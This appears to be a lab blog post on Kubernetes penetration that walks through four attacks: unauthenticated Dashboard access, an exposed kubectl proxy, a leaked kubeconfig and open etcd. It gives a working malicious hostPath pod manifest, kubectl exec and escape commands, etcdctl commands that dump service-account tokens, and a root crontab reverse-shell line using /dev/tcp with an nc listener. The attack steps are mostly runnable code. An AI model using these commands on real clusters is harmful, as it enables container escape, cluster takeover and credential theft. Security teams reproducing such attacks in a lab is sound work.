K8s-2: Unauthorized Access - proxy


K8s-2: Unauthorized Access
#

The K8s cluster installation and configuration is covered in the previous blog post.

K8s Cluster Penetration
#


Make sure everything is in the Running state before starting, otherwise the experiments will not work, and the component versions must be compatible.

Note: Pods in K8s are described with YAML, while Docker builds images from a Dockerfile.
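
A quick sanity check before starting (a minimal sketch; run it on the master node):

# every node should be Ready and on a compatible version
kubectl get nodes -o wide
kubectl version
# the control-plane pods (apiserver, etcd, scheduler, ...) should all be Running
kubectl get pods -A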

1: Dashboard Unauthorized Access (8001)
#

Default port: 8001
A misconfigured Dashboard allows unauthenticated access, and through the Dashboard the whole cluster can be controlled.
Kubernetes Dashboard unauthorized access actually comes in two flavors:
In the first, the Dashboard has HTTP endpoints that require no login; these endpoints are normally not exposed, but if they are reachable from outside, the Dashboard is open without authentication. In the second, developers find logging in inconvenient and change the configuration so that the HTTPS Dashboard page can skip the login step.
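
Whether the second case applies can be checked from the Dashboard Deployment itself (a minimal sketch, assuming the standard kubernetes-dashboard namespace and deployment name):

# if --enable-skip-login appears in the args, the login page shows a Skip button
kubectl -n kubernetes-dashboard get deployment kubernetes-dashboard \
  -o jsonpath='{.spec.template.spec.containers[0].args}'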

*Reproduction and exploitation:
*With enable-skip-login turned on, you can click Skip on the login page to enter the Dashboard
*The kubernetes-dashboard ServiceAccount is bound to cluster-admin (the highest cluster-management privilege)
1. Install: https://blog.csdn.net/justlpf/article/details/130718774
2. Deploy: kubectl create -f recommended.yaml --validate=false  (I reached the Dashboard via the node's IP)
3. Uninstall: kubectl delete -f recommended.yaml
4. Check: kubectl get pod,svc -n kubernetes-dashboard
5. Exploit: create a new Pod; the rest is the same as the earlier exploitation
*Attack chain: find the exposed Dashboard -> skip the login -> create or upload a Pod -> exec into it -> escape via the host mount

recommended.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  type: NodePort
  ports:
    - port: 443
      targetPort: 8443
      nodePort: 30009
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
    # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
    # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      securityContext:
        seccompProfile:
          type: RuntimeDefault
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.5.0
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --enable-skip-login
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
              # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
    spec:
      securityContext:
        seccompProfile:
          type: RuntimeDefault
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.7
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
          - mountPath: /tmp
            name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}
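
With the manifest above applied, the Dashboard Service is a NodePort on 30009, so the login page is served at https://<node-ip>:30009/. A minimal check (192.168.79.131 is the lab node used throughout this post):

kubectl get svc kubernetes-dashboard -n kubernetes-dashboard
# expect TYPE NodePort and PORT(S) 443:30009/TCP
curl -k https://192.168.79.131:30009/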


Click Skip and you go straight in (remember to switch browsers).


Click Pods -> click the plus sign and upload the malicious Pod.


test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hajimedie
spec:
  containers:
  - image: nginx
    name: hajimedie
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
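    # hostPath "/" mounts the node's entire root filesystem at /mnt inside the container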
    hostPath:
      path: /

Once the Pod is created, open a shell into it from the Dashboard; with the host filesystem mounted, you can escape the container.
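
Inside that shell the node's root filesystem sits under /mnt, so a minimal escape sketch looks like this (the attacker IP/port in the cron line are placeholders for your own listener):

# the node's filesystem is mounted read-write at /mnt
ls /mnt/etc/kubernetes
# option 1: chroot into the host filesystem
chroot /mnt /bin/bash
# option 2: drop a cron job on the node (the same crontab trick is reused later in this post)
echo -e "* * * * * root bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1\n" >> /mnt/etc/crontab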


When the experiment is finished, clean up with kubectl delete -f recommended.yaml.

2: kubectl proxy Unauthorized Access
#

When operations staff need to expose a port or an IP for some environment, they use kubectl proxy.

Running kubectl proxy makes the API server listen on a chosen local port.

Environment setup:

kubectl --insecure-skip-tls-verify proxy --accept-hosts='^.*$' --address=0.0.0.0 --port=8009
This proxies the API server onto port 8009 and, with --address=0.0.0.0, exposes it on every interface.

From here it is the same as the API server unauthorized-access attack in the first blog post.


Next, upload the Pod, get a shell, and escape via the mount, just like in the first blog post.
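
A minimal sketch of driving the attack through the proxy (192.168.79.131 is the lab host running kubectl proxy; test.yaml is the hostPath Pod from above):

# the proxied API requires no authentication at all
kubectl -s http://192.168.79.131:8009 get nodes
kubectl -s http://192.168.79.131:8009 get pods -A
# create the malicious Pod through the proxy and exec into it
kubectl -s http://192.168.79.131:8009 apply -f test.yaml
kubectl -s http://192.168.79.131:8009 exec -it hajimedie -- /bin/bash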

3: Config (kubeconfig) Credential File Leak
#

An attacker who obtains the cluster's config file, for example via a webshell or a GitHub leak, can operate the cluster and take over every container. The K8s config file is the cluster's management credential and contains its key details (API server address, login credentials).
Default location:
/root/.kube/config
[root@master-1 .kube]# ls -al
total 16
drwxr-xr-x. 4 root root   51 Aug 27 23:25 .
dr-xr-x---. 6 root root 4096 Aug 28 23:41 ..
drwxr-x---. 3 root root   23 Aug 27 23:25 cache
-rw-------. 1 root root 5450 Aug 27 23:25 config
drwxr-x---. 3 root root 4096 Aug 28 23:38 http-cache
[root@master-1 .kube]# 

kubectl -s https://192.168.79.131:6443/ --kubeconfig=config --insecure-skip-tls-verify=true get nodes

Then upload the Pod, exec into it, and escape via the mount:

kubectl -s https://192.168.79.131:6443/ --kubeconfig=config --insecure-skip-tls-verify=true apply -f test.yaml -n default

kubectl -s https://192.168.79.131:6443/ --kubeconfig=config --insecure-skip-tls-verify=true exec -it hajimedie -n default -- bash

Reverse shell:

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.79.131/4444 0>&1\n" >> /mnt/etc/crontab
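
The cron job fires every minute as root on the node, so all the attacker needs is a listener on the callback port (4444 here, matching the line above):

# on the attacking machine
nc -lvnp 4444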

4: etcd Unauthorized Access
#

etcd

etcd stores the entire state of the cluster.
Its configuration is the static Pod manifest /etc/kubernetes/manifests/etcd.yaml; after editing it, restart with systemctl restart kubelet.service.

Setting --client-cert-auth to false turns off certificate verification; if etcd is not exposed externally, fall back to SSRF.

--listen-client-urls: if the address that follows is 127.0.0.1, etcd only accepts local connections, but SSRF can get around that.
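
A minimal sketch of checking how the etcd static Pod is configured (flag names as written in a kubeadm-generated manifest):

# which client addresses etcd listens on, and whether client cert auth is enforced
grep -E -e '--listen-client-urls|--client-cert-auth' /etc/kubernetes/manifests/etcd.yaml
# kubelet recreates the static Pod after the manifest changes
systemctl restart kubelet.service
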
Three scenarios:
First: --client-cert-auth is not set, so certificate verification is off and an etcd service exposed to the outside is open to unauthorized access.
- Reachable externally: query it directly without authentication and harvest secrets and tokens

Second: certificate verification is enabled, so 127.0.0.1:2379 can be reached locally without authentication, but any other address must present a client certificate; this usually needs SSRF or another primitive and is of limited use.
- Local access only: query it directly (from the host) without authentication and harvest secrets and tokens

Third: in practice a default K8s install makes 2379 listen only on localhost; unless it is bound to 0.0.0.0 it cannot be reached from the Internet, so at most local access is possible and SSRF or something similar is needed.
- Local access only: use SSRF or another primitive to harvest secrets and tokens


*Reproduction and exploitation:
*Exposed unauthenticated etcd -> dump secrets & tokens -> take over via the API Server
*SSRF to bypass the access restriction -> dump secrets & tokens -> access the API Server with the token
*For the v2/v3 API differences see: https://www.cnblogs.com/qtzd/p/k8s_etcd.html
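
The etcdctl commands below assume the v3 API (the default in recent etcdctl builds); if your binary still defaults to v2, select v3 explicitly first:

export ETCDCTL_API=3
./etcdctl version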

./etcdctl --endpoints=192.168.79.131:23791 get / --prefix --keys-only | grep /secrets/

Read a service account token:

./etcdctl --endpoints=192.168.79.131:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole

./etcdctl --endpoints=192.168.79.131:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z

Access the API Server with that token to gain control of the cluster:

kubectl --insecure-skip-tls-verify -s https://192.168.79.131:6443/ --token="xxxxx" -n kube-system get pods
